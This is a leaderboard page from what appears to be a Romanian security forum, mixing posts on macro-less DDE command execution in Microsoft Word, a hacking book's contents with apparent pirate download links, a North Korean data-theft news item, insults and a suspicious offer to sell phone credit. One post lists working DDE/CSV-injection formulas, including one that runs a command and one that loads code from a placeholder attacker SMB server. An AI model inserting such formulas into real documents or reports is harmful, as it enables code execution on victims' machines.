Leaderboard

Popular Content

Showing content with the highest reputation on 10/10/17 in all areas

  1. What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?! Windows provides several methods for transferring data between applications. One method is to use the Dynamic Data Exchange (DDE) protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available. In our context DDE works by executing an application that will provide the data (data provider). In a previous post we discussed using DDE in MSExcel to gain command execution, and have had great success in using this technique to bypass macro filtering mail gateways and corporate VBA policies. DDE isn’t only limited to Excel and Word has had DDE capabilities all this time. This has been mentioned by others as a possible avenue, but to our knowledge, no-one has actually demonstrated this to work. https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ I tried it in Word 2010, and it works.
    3 points
  2. BRIEF CONTENTS: Foreword by Matt Graeber; Preface; Chapter 1: C# Crash Course; Chapter 2: Fuzzing and Exploiting XSS and SQL Injection; Chapter 3: Fuzzing SOAP Endpoints; Chapter 4: Writing Connect-Back, Binding, and Metasploit Payloads; Chapter 5: Automating Nessus; Chapter 6: Automating Nexpose; Chapter 7: Automating OpenVAS; Chapter 8: Automating Cuckoo Sandbox; Chapter 9: Automating sqlmap; Chapter 10: Automating ClamAV; Chapter 11: Automating Metasploit; Chapter 12: Automating Arachni; Chapter 13: Decompiling and Reversing Managed Assemblies; Chapter 14: Reading Offline Registry Hives. https://www.google.ro/url?sa=t&source=web&rct=j&url=https://dl.kuroy.me/foreign/learnflakes/Brandon%20Perry%20-%20Gray%20Hat%20C%23/Brandon%20Perry%20-%20Gray%20Hat%20C%23_%20A%20Hacker%27s%20Guide%20to%20Creating%20and%20Automating%20Security%20Tools.pdf&ved=0ahUKEwjk_NfE74nYAhVS46QKHQNyCC4QFggjMAA&usg=AOvVaw1eTppV_6dAAZgoATyu8nOR https://smtebooks.com/Downloads/5794/gray-hat-c-pdf https://github.com/brandonprry/gray_hat_csharp_code https://books.google.ro/books?id=uAYvDwAAQBAJ&pg=PA130&lpg=PA130&dq=Gray+Hat+C%23:+Creating+and+Automating+Security+Tools+pdf&source=bl&ots=ZmCsAeFAsJ&sig=TmcTTAcgaYNH5c6nwy33VaY6fhQ&hl=ro&sa=X&ved=0ahUKEwiKnZr3w-bWAhXMKVAKHexJAA04ChDoAQgkMAE#v=onepage&q=Gray Hat C%23%3A Creating and Automating Security Tools pdf&f=false
    1 point
  3. Like in movies about idiots.. Hackers from North Korea are reported to have stolen a large cache of military documents from South Korea, including a plan to assassinate North Korea's leader Kim Jong-un. Rhee Cheol-hee, a South Korean lawmaker, said the information was from his country's defence ministry. The compromised documents include wartime contingency plans drawn up by the US and South Korea. They also include reports to the allies' senior commanders. He said some 235 gigabytes of military documents had been stolen from the Defence Integrated Data Centre, and that 80% of them have yet to be identified. Full article
    1 point
  4. Another recent article on the same topic - http://georgemauer.net/2017/10/07/csv-injection.html. There are a few nice things that can be done with DDE: =cmd|'/C calc'!A0 (the classic example) =IExplore|WWW_OpenURL!www.mataigrasa.com =regsvr32|\\<fakeSmbServer>\\mataigrasa!A0 Most of the time I have run into this in web applications that generate reports in CSV/XLS format where you have some control over the data that goes into the report.
    1 point
  5. 2017-10-10 10:42:21,086 fail2ban.actions: WARNING [ssh] Ban meteor
    1 point
  6. Yes, interesting, but the exploitation methods (classic and with DDE) are already known from exploiting CSV injection (https://www.contextis.com/blog/comma-separated-vulnerabilities). Good to know that it works in Word too; too bad that in this case as well two alerts appear.
    1 point
  7. Promotions from various online stores, updated daily. https://pricezone.ro/promotions
    1 point
  8. What a way of expressing yourself... did you just crawl out of the sewer? How the hell do all you morons find this forum, hard to understand.
    1 point
  9. 1 point
  10. "The number the number the number". You reminded me of "And... the solution? What is the solution? The solution, gentlemen?" Mihaitza boss. Get lost :)))))))))
    1 point
  11. Is your ass itching? What the hell did I say to you, you cultured one, instead of leaving a good idea so we could somehow get in touch; I have had an account here for 5 years, you lackey,
    -1 points
  12. Selling credit for all networks (orange, vodafone, telekom) 5-30$, serious inquiries only ...
    -2 points